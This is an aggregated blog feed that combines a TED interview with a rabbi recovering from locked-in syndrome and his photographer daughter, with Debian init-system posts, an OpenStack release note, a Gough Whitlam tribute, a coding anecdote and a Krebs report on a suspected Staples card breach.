It took me three and a half months to get off the artificial breathing machine. That was my first miraculous victory. The next task was to get my epiglottis active. They wanted to give me thickened food — puréed this-and-that — whereas I wanted raw vegetables and fruit. I was denied the right to drink water for months over months. Water is the source of life, that which I craved most as an elixir. I dreamt of it. I tasted it. I could sense the coldness and the raw beauty of thirst — parched parts quenched. These days I eat whatever I want, whatever I am blessed with. I have a good physio who stands me upright, and a speech therapist to bring out the voice.

How would you describe your mental and emotional state during the time of being locked in?

The stroke transcended me. I don’t know much about it except that I was replanted into the ground and found my discombobulated bodyparts spread across the landscape. My holy work of these last three years has been to re-unify from a central whirlwind of light — dizzying, upside-down, topsy-turvy. I want to grow this plant of mine out of the underground. I imagine this is what every seed sees before it proceeds.

Doctors live by science and statistics. Rabbis live by inner spirit and G-dliness. Nobody has ever asked me what it’s like to have a paralyzed digit — fingers that lead a motionless existence. I, too, refrain from asking: “How does it feel to handle dried-up bones? Do you fear a life without movement?” But this is the under-exchange of everyone in touch with those who can’t touch back. My biggest loss is the gentle caress that I once could give.

Throughout this process, the air I breathe has been full with open prayers of love, with eyes upon me, soothing, cooing soft-spoken kindnesses. My family wiggles my flapping shoulder blades to revive them. My congregation visits me as if agreeing that nothing has happened; there is no loss, there is only us today and our future. We all ease each other’s lives. I am wondrously happy for the privilege of seeing life in this dimension. I capture miracles in instants. Challenge is privilege. It is a privilege to live this story.

The images Kitra takes of you feel very vulnerable and reflective. Did your father-daughter relationship change dramatically after the stroke?

I am in awe of Kitra’s art and her desire to unstiffen what is locked up. She finds communities of the locked-away; she researches for breakthroughs and latest up-to-date machinery and medical advances. She speaks the language of negating the impossible. She champions me through pitfalls and traps of institutional clumsiness. She sees me already walking through the streets; she chaperones me down the halls of my returning. It is wondrous to never be defeated. Transformation is celebratory.

I loved Kitra the same in the instant of her birth. She created me as a father that day. I’ve only begun to emerge as she nurses me and nurtures me up to a sense of knowing what it means to be alive. My love for her and all my children has deepened in the emergency status. There is only intimate language in the presence of a precious person of your own issue. The privilege of parenthood is even more daunting than the responsibility. I am overwhelmed with the gratitude of being remade in my children’s image now that they are adults. I tell them I see G-d’s face when they present their loving glow. They are the Sabbath candles themselves.

You wrote texts to go with each of Kitra’s images. To whom are they addressed? They seem to be meditations on consciousness rather than communication. After your illness, was all your communication in this form?

After coming to consciousness, the mind narrowed to simple whispers. I was bare-faced and raw matter. The blessing ‘to bless’ in Hebrew is “Yisai Adonai Panav Elecha,” or “May G-d lift your countenance.” “Ya’er Panav Elecha v’Chuneka.” “May G-d’s light illuminate your face and bring forth your grace.” Or as King David said, “From G-d’s divine light we see light.” At the moment of arising from the stroke, I felt G-d lift my face and pierce into an inner glow. I spoke to that light and from it all at once. I understood that everyone gets this brilliant radiance early in life, and I know that it’s a mere temporary flash to return to again and again. This is enlightened consciousness. It’s a flash that I ever try to retrieve.

All my writings are love songs to G-d. I only have thanks. G-d has given me a future again. And this is a glimpse (the marvel) of eternity’s touch.

Your texts refer to a passionate love. Is this about the love between husband and wife, or love for the divine?

Both. G-d’s challenge to each human being is to reach the fullest extent of your capacity to love and ever grow it, ever test it, ever push it. That’s why we are created and how we continue creating ourselves. The passionate love of me to my wife, my wife to me, is an embodiment of the challenging love that the Almighty presents before us. How much of the heavenly abode do we bring into our love? Loving [my wife] Karen, she loving me, brings us to seek the Almighty’s presence. When I pray to G-d I ask to find Karen. When I’m near Karen, I ask her to help me discover the Creator of Life. This is love language. It doesn’t matter what state of disrepair the body is in. This is the heart’s fullest reach. Nothing has changed in our love for each other. I am alive because I live for Karen’s eyes upon me once again.


Rabbi Cahana writes, “What is beautiful? We can close our eyelids, but it’s hard to close our ears. All directions can come to the ear. We can’t really turn our heads, like in seeing, to a particular angle. Hearing is how G-d responds to prayer. That’s sincere.” Photo: Kitra Cahana

Rabbi Cahana writes, "Oh my wife. I belong to you. I see the skin fold hurry under your eyelids. I want to be your sleep. I walk along your long grace. Your bones are hard to everyone’s stance but not to my fingers’ touch. There are tender demands when you open your lips, your tongue, your teeth. Your teeth are teaching my empty throat. Am I only just now breathing? G-d has given me this. We are face, two legs, alike. We have no weight. Wherever we are, the world is turning. This is nonesuch time." Image: Kitra Cahana

Rabbi Cahana writes, “Oh my wife. I belong to you. I see the skin fold hurry under your eyelids. I want to be your sleep. I walk along your long grace. Your bones are hard to everyone’s stance, but not to my fingers’ touch. There are tender demands when you open your lips, your tongue, your teeth. Your teeth are teaching my empty throat. Am I only just now breathing? G-d has given me this. We are face, two legs, alike. We have no weight. Wherever we are, the world is turning. This is nonesuch time.” Image: Kitra Cahana

<iframe allowfullscreen="allowfullscreen" class="wpcom-protected-iframe " frameborder="0" height="552" id="wpcom-iframe-a2d73d0d36dc9060c36f055480d18d80-54494268c5700" mozallowfullscreen="mozallowfullscreen" name="wpcom-iframe-a2d73d0d36dc9060c36f055480d18d80-54494268c5700" scrolling="no" webkitallowfullscreen="webkitallowfullscreen" width="982"></iframe> <script type="text/javascript"> ( function() { var func = function() { var iframe_form = document.getElementById('wpcom-iframe-form-a2d73d0d36dc9060c36f055480d18d80-54494268c5700'); var iframe = document.getElementById('wpcom-iframe-a2d73d0d36dc9060c36f055480d18d80-54494268c5700'); if ( iframe_form && iframe ) { iframe_form.submit(); iframe.onload = function() { iframe.contentWindow.postMessage( { 'msg_type': 'poll_size', 'frame_id': 'wpcom-iframe-a2d73d0d36dc9060c36f055480d18d80-54494268c5700' }, window.location.protocol + '//' ); } } // Autosize iframe var funcSizeResponse = function( e ) { var origin = document.createElement( 'a' ); origin.href = e.origin; // Verify message origin if ( '' !== ) return; // Verify message is in a format we expect if ( 'object' !== typeof || undefined === ) return; switch ( ) { case 'poll_size:response': var iframe = document.getElementById( ); if ( iframe && '' === iframe.width ) iframe.width = '100%'; if ( iframe && '' === iframe.height ) iframe.height = parseInt( ); return; default: return; } } if ( 'function' === typeof window.addEventListener ) { window.addEventListener( 'message', funcSizeResponse, false ); } else if ( 'function' === typeof window.attachEvent ) { window.attachEvent( 'onmessage', funcSizeResponse ); } } if (document.readyState === 'complete') { func.apply(); /* compat for infinite scroll */ } else if ( document.addEventListener ) { document.addEventListener( 'DOMContentLoaded', func, false ); } else if ( document.attachEvent ) { document.attachEvent( 'onreadystatechange', func ); } } )(); </script>

Rabbi Cahana writes, “There’s a new kind of slumber with a stroke. You get dizzy, lucid. There is a mini explosion and there is no up. There is no forward. It’s just twisting like a space-man’s walk, tethered to the intangible. It’s amazing. I was lifted into a hoist. I said to myself: Remember you’re in the air for real now. Hover over this bed, and be there more than you are under it.” Video: Kitra Cahana

My dream state is closer to G-d than any open-eyed watch of how foreshortened my wingspan might be. I feel awake and alive and follow through with what my body can’t seem to do. It’s not pretending when I say I believe this is only temporary. It is my open-aired will that makes these three years seem like only a blink. And still I see the world stumble by and I criticize its footwork. I still believe I walk more gracefully. After all, who among us is really sure-footed?

Rabbi Cahana writes, “My dream state is closer to G-d than any open-eyed watch of how foreshortened my wingspan might be. I feel awake and alive and follow through with what my body can’t seem to do. It’s not pretending when I say I believe this is only temporary. It is my open-aired will that makes these three years seem like only a blink. And still I see the world stumble by and I criticize its footwork. I still believe I walk more gracefully. After all, who among us is really sure-footed?” Image: Kitra Cahana

Rabbi Cahana writes, "I singsong my body as its own cradle. Back and up head and down. There is a floating whir on my skin. Only a year and a half later will it dissipate. Its the skinny skin that crinkles. My eyes stay closed. All of life now will forever be whispers. But G-d’s ear is here." Image: Kitra Cahana

Rabbi Cahana writes, “I singsong my body as its own cradle. Back and up head and down. There is a floating whir on my skin. Only a year and a half later will it dissipate. Its the skinny skin that crinkles. My eyes stay closed. All of life now will forever be whispers. But G-d’s ear is here.” Image: Kitra Cahana

Kitra Cahana answers our questions about these images

What has your father’s experience been like for you?

It has been a shift in my trajectory. My father’s experience of the stroke was one of endless spirituality and curiosity and this mystical understanding of how to heal. He’s a rabbi, a spiritual leader and poet and as such often spoke in this kind of otherly language about reality and his experience — a very surreal, poetic language. His language has a cadence of its own. Sometimes it can be difficult to understand, but it speaks to me on a deep level. Somehow it’s very accessible to me.

We were raised on mystical ideas about G-d. ‘Does G-d exist?’ was never a relevant or pertinent question to my spirituality. The root question to ask is: How do people experience existence? Do you have an experience of a G-d or a G-dlike concept? is more telling to me, than declaring one’s belief in an unknown. I’ve approached a lot of what my father has said regarding his stroke in the same manner. I don’t question what he says, as in: ‘Did that really happen?’ He had many visions when the stroke first struck him. In one, he had an encounter, standing before G-d, wherein the totality of his own life, his own soul, accused him for all his wrong-doings and shortcomings. His own father’s soul came to his defense, and pleaded for my father to get more life. I don’t question whether that is real or not. I listen to him openly, trying to just understand what his experience of reality looks like.

How do you do that? How does he communicate?

Right after the stroke, we communicated through a blinking methodology where the transcriber recites the alphabet and he would blink at each letter. People started flocking to our ICU room, and then our hospital room, and he would hold these long conversations with them. Congregants, nurses and orderlies would come to his bedside at their break time and, through us, my father would counsel them. It was all in this very, very slow time — this sort of otherly orbit that was created in midst of the hustling, bustling hospital.

Initially, communication was extremely disorienting. Until we got into a good rhythm and flow — and established how to initiate vowels, and other shortcuts — there were so many miscommunications. We would recite the alphabet, A, B, C, D, and he would wait to blink at the correct letter. Afterwards he told us that anticipating each letter was excruciating. He would keep his eyes wide open, in fear that he would blink at the wrong letter and our whole communication would get thrown off. There were so many moments to misread what he wanted to say. Even when he started mouthing, and then speaking intermittently, it continued — and continues — to be difficult. Initially we tried different methods. We tried to do the alphabet of most commonly used letters, but there were a lot of confusions. There’s another smart system wherein the locked-in patient divides his or her gaze into different quadrants, and then divides each quadrant again to indicate a specific letter. We could have learned that language, but I think my father was in such a rush to express all the things running through his mind that the simple ABCD method was the easiest.

Can he feel his body right now?

He always had sensation. But he describes his first sensation as though he were floating through the ether. He has this strange description that each of his limbs were dead logs and tethered to each was this miniature limb that was just full of spirit — zinging all over the room. He said there was a rope attached to each of these smaller limbs, and that if the rope wasn’t there, these limbs would just fly across the world, to everywhere. I don’t necessarily understand his physical experience. He describes it as being rebirthed at 57 — that he was conscious, going through the birth canal. He says ‘I’m two years old now.’ To him that’s a complete privilege and blessing.

Initially, I started documenting him in the style that I know — traditional journalistic photographs. But those photographs were so literal. Those images spoke to the care and the love in our hospital room, but they weren’t able to access the deeper soul experience. My challenge was to find a visual language that would be in dialogue with our spiritual and emotional landscape.

Did changing your usual style feel good?

I’ve never felt like my documentary work reflected my inner essence. In a way, when I work on a story — documenting in a traditional documentary manner — I feel as though my role between my subject and the audience is one of a medium. There’s a subject who passes through my lens, my aesthetic filter, in order to reach an audience, a public. I can overlay an aesthetic voice to that, but I never felt like I was giving it my voice. Photographing my father — layering images, video and audio on top of each other — it’s the first time I’m expressing something deep inside of me in a photographic language. I’ve never felt that way about my work before. It’s the first seed. But it’s lovely growing into this new place with my father as a collaborator and subject.

What motivated you to speak at TEDMED?

It’s very difficult to express the sublime and the surreal in words and photographs. I wanted to attempt to communicate all that my family had experienced – my father’s brain stem stroke, and the profound spiritual awakening that followed – with others. This is what my father taught us; he said that all who came into his room of healing should expect to be healed themselves. Healing has to be mutual.

The stroke ruptured my reality as well as his. In those initial months, I saw sides of myself I never knew existed. I would have loved for him to have spoken at TEDMED himself but, as in the hospital — where my mother, sisters, brother and I acted as his mouthpiece — we continue to act in that capacity.

What impact do you hope the talk will have?

Part of my father’s message is that he hopes others will step outside of the space-time hustle and bustle that many of us are so used to. He experiences life in a kind of slow-time. He spent and continues to spend hours alone with himself.  That space of aloneness with his thoughts is not a place of anxiety, but a place of joy and introspection. I hope that others get a sense of this slow-space-time, where you exist only with yourself, with those other humans that you are intimate with, and – as my father would also say – with God.

Since my father’s stroke, I’ve become involved in a global community of people who have experienced brain stem strokes, either personally or on the part of a loved one. They are either still fully locked-in or have made progress, including some partial to full recoveries. So many of those who have experienced being locked-in were written off too early. Their families were told to expect very little. As a result, they did not receive proper rehabilitation therapies, nor were their bodies moved on a daily basis to maintain a minimum quality of comfort. I’ve seen health care professionals refuse to address the locked-in patient directly, speaking about him or her in the third person, insensitive to the fact that the person is still completely conscious and able to communicate. We struggle every day to sensitize health care professionals and institutions.

Healing is taxing. But what is even more taxing is trying to heal in systems and institutions that drain the already low reserves of patients. My father was able to have the spiritual experience that he had because he had a family and a congregation that preserved him in his role as father, husband and rabbi and advocated for him when he wasn’t able to.

You said before that he can feel his body now. To what extent?

He’s made huge progress — he breathes by himself, he predominantly has his own speaking voice to rely on now. It wanes, but he conducted a wedding last year, and he teaches in the synagogue. He has some motion capabilities. A lot of it’s about getting stronger; it’s really hard to rebuild an entire body all at once. I don’t know if or when he’s going to reach his limits, but that’s not an important question to me. To me, it’s about being part of his healing support network.


Rabbi Cahana writes, “When my brain exploded my body flew apart onto my backyard, only ten times larger. My mind landed on top of the hedges. One arm a mile away, another arm over here. Legs here, legs there. The torso somewhere else. It was my job to somehow bring these all back together. To bring the body back to the head. This was my spiritual duty.” Image: Kitra Cahana

Want to support Rabbi Cahana? Find out how.

And special thanks to TEDMED, for contributing to this piece.

TEDAndrew Bastawrous’ bakery for better eye care gets lift off, the Sleepy Man Banjo Boys make a video, and more


As always, members of the TED community have been very busy the past few weeks. Below, just a few of them making the news:

Earlier this month, Mazda promised to fund one of four projects dreamed up by TED Fellows — based on your votes. The winner: eye surgeon Andrew Bastawrous has won for his Eye Bake program. With Mazda’s help, he’ll be building up the Ujima Bakery in Kenya, which will employ local people while raising money to subsidize eye care. (Watch Andrew’s TED Talk, “Get your next eye exam on a smartphone.”)

Susan Cain is writing a children’s book, to be released in May 2015. While Quiet focused on the workplace, this new book — called Quiet Power – will focus on school, extracurriculars and family life. It’ll also feature illustrations by Grant Snider. (Watch Susan’s talk, “The power of introverts.” And read our interview with her: “How to teach a young introvert.”)

Speaking of school, Clay Shirky has banned the use of technology in his classes. In an essay on Medium, he admits that this is a bold move for a technologist. (Watch Clay’s most recent TED Talk, “How the internet will (one day) transform government.”)

The Sleepy Man Banjo Boys have made their very first music video: “Same Same Stars.” Watch it below. (And check out their TED Talk, “Teen wonders play bluegrass.”)

<iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src=";rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

Sculptor Janet Echelman has received the Smithsonian American Ingenuity Award in Visual Arts. She accepted the award at a gala award ceremony at the National Portrait Gallery in Washington, DC. (Watch Janet’s talk, “Taking imagination seriously.” And read about her sculpture at TED2014, “Skies Painted with Unnumbered Sparks.”)

Dave Eggers tells The San Francisco Chronicle that his publishing house, McSweeney’s, is applying to become a nonprofit. “It just seemed that increasingly many of the things that we wanted to do were nonprofit projects and not really things that you could reasonably expect to break even on,” he explains. (Watch Dave’s TED Prize Wish revealed in the talk, “Once upon a school.”)

Majora Carter has big plans for the shuttered juvenile detention center down the road from her childhood home in the Bronx, New York. Once a place known for its brutal conditions, she shares with Next City her plans to transform it into a space of opportunity in the community. (Watch Majora’s talk, “3 stories of local eco-entrepreneurship.”)

Planet DebianLucas Nussbaum: Tentative summary of the amendments of the init system coupling GR

This is an update of my previous attempt at summarizing this discussion. As I proposed one of the amendments, you should not blindly trust me, of course. :-)

First, let’s address two FAQ:

What is the impact on jessie?
On the technical level, none. The current state of jessie already matches what is expected by all proposals. It’s a different story on the social level.

Why are we voting now, then?
Ian Jackson, who submitted the original proposal, explained his motivation in this mail.

We now have four different proposals: (summaries are mine)

  • [iwj] Original proposal (Ian Jackson): Packages may not (in general) require one specific init system (Choice 1 on this page)
  • [lucas] Amendment A (Lucas Nussbaum): support for alternative init systems is desirable but not mandatory (Choice 2 on this page)
  • [dktrkranz] Amendment B (Luca Falavigna): Packages may require a specific init system (Choice 3 on this page)
  • [plessy] Amendment C (Charles Plessy): No GR, please: no GR required (Choice 4 on this page)

[plessy] is the simplest, and does not discuss the questions that the other proposals are answering, given it considers that the normal Debian decision-making processes have not been exhausted.

In order to understand the three other proposals, it’s useful to break them down into several questions.

Q1: support for the default init system on Linux
A1.1: packages MUST work with the default init system on Linux as PID 1.
(That is the case in both [iwj] and [lucas])

A1.2: packages SHOULD work with the default init system on Linux as PID 1.
With [dktrkranz], it would no longer be required to support the default init system, as maintainers could choose to require another init system than the default, if they consider this a prerequisite for its proper operation; and no patches or other derived works exist in order to support other init systems. That would not be a policy violation. (see this mail and its reply for details). Theoretically, it could also create fragmentation among Debian packages requiring different init systems: you would not be able to run pkgA and pkgB at the same time, because they would require different init systems.

Q2: support for alternative init systems as PID 1
A2.1: packages MUST work with one alternative init system (in [iwj])
(Initially, I thought that “one” here should be understood as “sysvinit”, as this mail, Ian detailed why he chose to be unspecific about the target init system. However, in that mail, he later clarified that a package requiring systemd or uselessd would be fine as well, given that in practice there aren’t going to be many packages that would want to couple specifically to systemd _or_ uselessd, but where support for other init systems is hard to provide.)
To the user, that brings the freedom to switch init systems (assuming that the package will not just support two init systems with specific interfaces, but rather a generic interface common to many init systems).
However, it might require the maintainer to do the required work to support additional init systems, possibly without upstream cooperation.
Lack of support is a policy violation (severity >= serious, RC).
Bugs about degraded operation on some init systems follow the normal bug severity rules.

A2.2: packages SHOULD work with alternative init systems as PID 1. (in [lucas])
This is a recommendation. Lack of support is not a policy violation (bug severity < serious, not RC). A2.3: nothing is said about alternative init systems (in [dktrkranz]). Lack of support would likely be a wishlist bug.

Q3: special rule for sysvinit to ease wheezy->jessie upgrades
(this question is implicitly dealt with in [iwj], assuming that one of the supported init systems is sysvinit)

A3.1: continue support for sysvinit (in [lucas])
For the jessie release, all software available in Debian ‘wheezy’ that supports being run under sysvinit should continue to support sysvinit unless there is no technically feasible way to do so.

A3.2: no requirement to support sysvinit (in [dktrkranz])
Theoretically, this could require two-step upgrades: first reboot with systemd, then upgrade other packages

Q4: non-binding recommendation to maintainers
A4.1: recommend that maintainers accept patches that add or improve
support for alternative init systems. (in both [iwj] and [lucas], with a different wording)

A4.2: say nothing (in [dktrkranz])

Q5: support for init systems with are the default on non-Linux ports
A5.1: non-binding recommendation to add/improve support with a high priority (in [lucas])

A5.2: say nothing (in [iwj] and [dktrkranz])


Comments are closed: please discuss by replying to that mail.

Planet DebianErich Schubert: Avoiding systemd isn't hard

Don't listen to trolls. They lie.
Debian was and continues to be about choice. Previously, you could configure Debian to use other init systems, and you can continue to do so in the future.
In fact, with wheezy, sysvinit was essential. In the words of trolls, Debian "forced" you to install SysV init!
With jessie, it will become easier to choose the init system, because neither init system is essential now. Instead, there is an essential meta-package "init", which requires you to install one of systemd-sysv | sysvinit-core | upstart. In other words, you have more choice than ever before.
Again: don't listen to trolls.
However, notice that there are some programs such as login managers (e.g. gdm3) which have an upstream dependency on systemd. gdm3 links against libsystemd0 and depends on libpam-systemd; and the latter depends on systemd-sysv | systemd-shim so it is in fact a software such as GNOME that is pulling systemd onto your computer.
IMHO you should give systemd a try. There are some broken (SysV-) init scripts that cause problems with systemd; but many of these cases have now been fixed - not in systemd, but in the broken init script.
However, here is a clean way to prevent systemd from being installed when you upgrade to jessie. (No need to "fork" Debian for this, which just demonstrates how uninformed some trolls are ... - apart from Debian being very open to custom debian distributions, which can easily be made without "forking".)
As you should know, apt allows version pinning. This is the proper way to prevent a package from being installed. All you need to do is create a file named e.g. /etc/apt/preferences.d/no-systemd with the contents:
Package: systemd-sysv
Pin: release o=Debian
Pin-Priority: -1
from the documentation, a priority less than 0 disallows the package from being installed. systemd-sysv is the package that would enable systemd as your default init (/sbin/init).
This change will make it much harder for aptitude to solve dependencies. A good way to help it to solve the dependencies is to install the systemd-shim package explicitly first:
aptitude install systemd-shim
After this, I could upgrade a Debian system from wheezy to jessie without being "forced" to use systemd...
In fact, I could also do an aptitude remove systemd systemd-shim. But that would have required the uninstallation of GNOME, gdm3 and network-manager - you may or may not be willing to do this. On a server, there shouldn't be any component actually depending on systemd at all. systemd is mostly a GNOME-desktop thing as of now.
As you can see, the trolls are totally blaming the wrong people, for the wrong reasons... and in fact, the trolls make up false claims (as a fact, systemd-shim was updated on Oct 14). Stop listening to trolls, please.
If you find a bug - a package that needlessly depends on systemd, or a good way to remove some dependency e.g. via dynamic linking, please contribute a patch upstream and file a bug. Solve problems at the package/bug level, instead of wasting time doing hate speeches.

Cory DoctorowI’m coming to Vancouver, Seattle, Portland, SF/Palo Alto!

As the tour with my graphic novel In Real Life draws to a close, my next tour, with my nonfiction book Information Doesn't Want to Be Free kicks off with stops down the west coast.

I've also got stops coming up in Warsaw, London, Stockholm, Ann Arbor, Baltimore, DC, and Denver -- here's the whole list. Here's some of what Kirkus Review had to say about the new book:

In his best-selling novel Ready Player One, Ernest Cline predicted that decades from now, Doctorow (Homeland, 2013, etc.) should share the presidency of the Internet with actor Wil Wheaton. Consider this manifesto to be Doctorow’s qualifications for the job.

The author provides a guide to the operation of the Internet that not only makes sense, but is also written for general readers. Using straightforward language and clear analogies, Doctorow breaks down the complex issues and tangled arguments surrounding technology, commerce, copyright, intellectual property, crowd funding, privacy and value—not to mention the tricky situation of becoming “Internet Famous.” Following a characteristically thoughtful introduction by novelist Neil Gaiman, rock star Amanda Palmer offers a blunt summary of today’s world: “We are a new generation of artists, makers, supporters, and consumers who believe that the old system through which we exchanged content and money is dead. Not dying: dead.” So the primary thesis of the book becomes a question of, where do we go from here? Identifying the Web’s constituents as creators, investors, intermediaries and audiences is just the first smart move. Doctorow also files his forthright, tactically savvy arguments under three “laws,” the most important of which has been well-broadcast: “Any time someone puts a lock on something that belongs to you and won’t give you the key, that lock isn’t there for your benefit.”

Planet Linux AustraliaAndrew Pollock: [life] Day 265: Kindergarten and startup stuff

Zoe yelled out for me at 5:15am for some reason, but went back to sleep after I resettled her, and we had a slow start to the day a bit after 7am. I've got a mild version of whatever cold she's currently got, so I'm not feeling quite as chipper as usual.

We biked to Kindergarten, which was a bit of a slog up Hawthorne Road, given the aforementioned cold, but we got there in the end.

I left the trailer at the Kindergarten and biked home again.

I finally managed to get some more work done on my real estate course, and after a little more obsessing over one unit, got it into the post. I've almost got another unit finished as well. I'll try to get it finished in the evenings or something, because I'm feeling very behind, and I'd like to get it into the mail too. I'm due to get the second half of my course material, and I still have one more unit to do after this one I've almost finished.

I biked back to Kindergarten to pick up Zoe. She wanted to watch Megan's tennis class, but I needed to grab some stuff for dinner, so it took a bit of coaxing to get her to leave. I think she may have been a bit tired from her cold as well.

We biked home, and jumped in the car. I'd heard from Matthew's Dad that FoodWorks in Morningside had a good meat selection, so I wanted to check it out.

They had some good roasting meat, but that was about it. I gave up trying to mince my own pork and bought some pork mince instead.

We had a really nice dinner together, and I tried to get her to bed a little bit early. Every time I try to start the bed time routine early, the spare time manages to disappear anyway.

Worse Than FailureCodeSOD: Is It Safer to Use Numbers?

Mac didn't know anything about how the JavaScript on the search page worked, and he wasn't that great at CSS styling, but that didn't matter. He had his orders. As part of the latest round of enhancements, the front-end developer had added another search parameter which would be passed via the regular search URL, and the back end needed to be adjusted to accomodate. (You know... instead of '' it now was ''.)

No problem. Mac made his tweak in the code and ran a quick test...which failed instantly in a spectacular way. "WTF? It's a parameter. Must be already used..." he thought, but nope.

Digging deeper, Mac came upon the following:

public enum eQueryParametersCount
  New = 2,
  Filtering = 3,
  Navigation = 6,
  SwitchView = 7

Odd. And then peppered throughout...

int iCount = Request.QueryString.Count;
if (iCount != (int)eQueryParametersCount.New
      && iCount != (int)eQueryParametersCount.Navigation
      && iCount != (int)eQueryParametersCount.Filtering
      && iCount != (int)eQueryParametersCount.SwitchView
  logger.Log("QueryString error: invalid querystring");


else if ((Request.QueryString.Count == (int)eQueryParametersCount.Filtering) && (!SetConfirmationMessage()))
       if (!GetOverallQuality())
         logger.Log("QueryString error: r not found or invalid value");

In short, the previous coders figured that it was much better to 'count' the number of parameters to determine what the user wanted instead of actually reading them. It also means you can never have 3 params because that is taken by a different enum.

As Mac set about tearing things apart he found himself considering how tough it would really be to pick up some web design skills.


Photo credit: Laineys Repertoire / Foter / CC BY

Planet DebianThomas Goirand: OpenStack Juno is out, Debian (and Ubuntu Trusty ports) packages ready

This is just a quick announce: Debian packages for Juno are out. In fact, they were ready the day of the release, on the 16th of October. I uploaded it all (to Experimental) the same day, literally a few hours after the final released was git tagged. But I had no time to announce it.

This week-end, I took the time to do an Ubuntu Trusty port, which I also publish (it’s just a mater of rebuilding all, and it should work out of the box). Here are the backports repositories. For Wheezy:

deb juno-backports main

deb juno main

For trusty:

deb trusty-juno-backports main

But of course, everything is also available directly in Debian. Since Sid/Jessie contains OpenStack Icehouse (which has more chance to receive long enough security support), and it will be like this until Jessie is released. So I have uploaded all of Juno into Debian Experimental. This shows on the OpenStack qa page (you may also notice that the team is nearly reaching 200 packages… though am planning to off-load some of that to the Python module team, when the migration to Git will be finished). On the QA page, you may also see that I uploaded all of the last Icehouse point release to Sid, and that all packages migrated to Jessie. There’s only a few minor issues with some Python modules which I fixed, that haven’t migrated to Jessie yet.

I can already tell that all packages can be installed without an issue, and that I know Horizon at least works as expected. But I didn’t have time to test it all just yet. I’m currently working on doing even more installation automation at the package level (by providing some OVS bridging init script and such, to make it more easy to run Tempest functional testing). I’ll post more about this when it’s ready.

Kelvin ThomsonDeath of Gough Whitlam

Gough Whitlam was a towering figure in Australian public life. I think he was the greatest man to ever grace the Australian Labor Party, and the most influential Australian Prime Minister of the past fifty years. He did this after enlisting during the Second World War with the RAAF. This was of course a very dangerous thing to do - my father's older brother John, after whom I have my middle name, did this too, but did not return.<o:p></o:p>

I was a year twelve student in 1972, and had a bright orange It's Time sticker on my school bag. I remember that after he won the election one of my schoolmates said to me that while he was keen for Gough to win, Gough would not be able to put an end to Australia's involvement in Vietnam, and to conscription, any time soon. I was crestfallen by this, and delighted when only a day or two later Gough's two-man Cabinet did precisely that.<o:p></o:p>

His leadership and vision for Australia was one of the key things that inspired me to join the Australian Labor Party, which I did in 1974. It was against the run of play, as Gough's government was thrown out comprehensively at the end of the next year. <o:p></o:p>

But his legacy has proved to be so longstanding that I think he can rightly claim to be the most influential Prime Minister of the past 50 years. It was such a monumental body of work that I cannot do justice to it, but there are a number of features of it which I want to single out. The introduction of free tertiary education. It made such a difference to the lives of so many. The more I look at it, the more I think it was a mistake to move away from that.<o:p></o:p>

Medibank, which was of course the predecessor of Medicare. It gave Australia quite possibly the best health care system in the world, where everyone, rich and poor alike, has access to high quality health care.<o:p></o:p>

The protection of the environment. Gough took the National government into the area of environment protection, preventing drilling of the Great Barrier Reef, ratifying the World Heritage Convention, the RAMSAR Convention, and passing the National Parks and Wildlife Conservation Act.<o:p></o:p>

Indigenous Affairs. Gough passed legislation to abolish discrimination against aboriginal people, and granted land rights to indigenous people, and returned lands in the Northern Territory to the Gurindji people.<o:p></o:p>

People will always draw on the aspects of someone's legacy that are consistent with their own views, and I am no different. In that vein I point out that in 1974 he wrote that traditional forms of democratic government are under challenge, and listed population growth as first among these. Later in that article he said “I do not envisage any dramatic increase in our present population, and indeed I would not wish to see one". I think he was absolutely right in that assessment. And indeed he cut migration numbers during his time as Prime Minister, which is perhaps not widely known.<o:p></o:p>

I had a number of conversations with him, and there are two that stick in my mind. The first is when I rang him as a young Member of Parliament with an interest in fixed-term Parliaments and knowledge that Gough had championed this cause, including a proposal for simultaneous Federal and State elections. I was pleased that my call was put through, and astonished that Gough was able to rattle off, without any forewarning of my call and in the days before the Internet and Google, the electoral arrangements for many of the states of the USA.<o:p></o:p>

Later on I won an afternoon tea with Gough in a Labor Party raffle. This time he did know I was coming, but it was 2002 and he was by then 86. I was again astonished to see that at the ripe old age of 86 he had gone to the trouble of looking me up on the Internet and coming to the afternoon tea extremely well informed about my background and interests.<o:p></o:p>

No doubt Gough made mistakes. But the fact is that anyone in public life makes decisions every day, and it is unreasonable to expect every one of those decisions to be correct. And a Prime Minister makes hundreds, even thousands of decisions. Yes he was defeated decisively after three years, but that should be understood in the context of coming to power after a 23 year absence for Labor, and bumping into a world which had been shaped by and was dominated by his political opponents. After the change of government Malcolm Fraser acknowledged the need to make the Senate more representative and sponsored a referendum to require State Parliaments to fill Senate casual vacancies with the nominee of the Party the Senator had belonged to. And it should also be understood that Gough was newly in power when the OPEC oil shock of 1974 hit - this generated inflation and unemployment, and most Western governments unfortunate enough to be in power at the time did not last for long.<o:p></o:p>

Gough's struggle with Malcolm Fraser was titanic. I remember United States commentators at the time remarking on the ability of the two men, and wondering why American politics was not throwing up leaders of comparable calibre.<o:p></o:p>

The best thing we can do to honour Gough's monumental legacy is to protect it. Whether it is tertiary education, or health, or environment protection, or indigenous affairs, we should honour and protect his legacy. Most of all I hope we remember his commitment to politics as an honourable profession. It is unthinkable to imagine Gough taking on a job as a corporate lobbyist or company director in a post political career. The idea of using a parliamentary career as a stepping stone to a cushy corporate job would have been anathema to him. <o:p></o:p>

I hope his life and example continues to inspire Australians to undertake public service, and to believe in the capacity of the political process to produce good outcomes, to make people’s lives better, for many years to come.<o:p></o:p>


Krebs on SecurityBanks: Credit Card Breach at Staples Stores

Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.

staplesAccording to more than a half-dozen sources at banks operating on the East Coast, it appears likely that fraudsters have succeeded in stealing customer card data from some subset of Staples locations, including seven Staples stores in Pennsylvania, at least three in New York City, and another in New Jersey.

Framingham, Mass.-based Staples has more than 1,800 stores nationwide, but so far the banks contacted by this reporter have traced a pattern of fraudulent transactions on a group of cards that had all previously been used at a small number of Staples locations in the Northeast.

The fraudulent charges occurred at other (non-Staples) businesses, such as supermarkets and other big-box retailers. This suggests that the cash registers in at least some Staples locations may have fallen victim to card-stealing malware that lets thieves create counterfeit copies of cards that customers swipe at compromised payment terminals.

